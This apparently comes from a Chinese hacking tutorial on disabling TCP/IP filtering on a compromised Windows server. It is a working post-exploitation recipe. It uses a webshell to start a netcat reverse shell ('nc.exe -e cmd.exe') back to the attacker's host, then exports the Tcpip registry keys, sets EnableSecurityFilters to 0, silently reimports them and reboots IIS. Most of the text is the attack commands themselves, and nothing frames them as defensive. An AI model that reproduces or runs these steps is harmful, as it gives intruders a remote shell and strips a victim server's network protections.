解除TCP/IP限制的小技巧

1.用NC反弹得到一个shell 

本机监听 NC -l -p 32 

WEBSHELL运行： 

x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port" 

得到一个shell 

2.CMD下导出注册表文件 
C:/>regedit -e x:/xxx/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Ser 
vices/Tcpip 

C:/>regedit -e x:/xxx/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip 

C:/>regedit -e x:/xxx/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip 

修改各文件 EnableSecurityFilters 处 
将最后的1改为0 

3.将注册表文件导入 
x:/xxx>regedit -s 1.reg 
x:/xxx>regedit -s 2.reg 
x:/xxx>regedit -s 3.reg 
-S 为无提示 

重启命令 iisreset /reboot 

完成TCP/IP筛选限制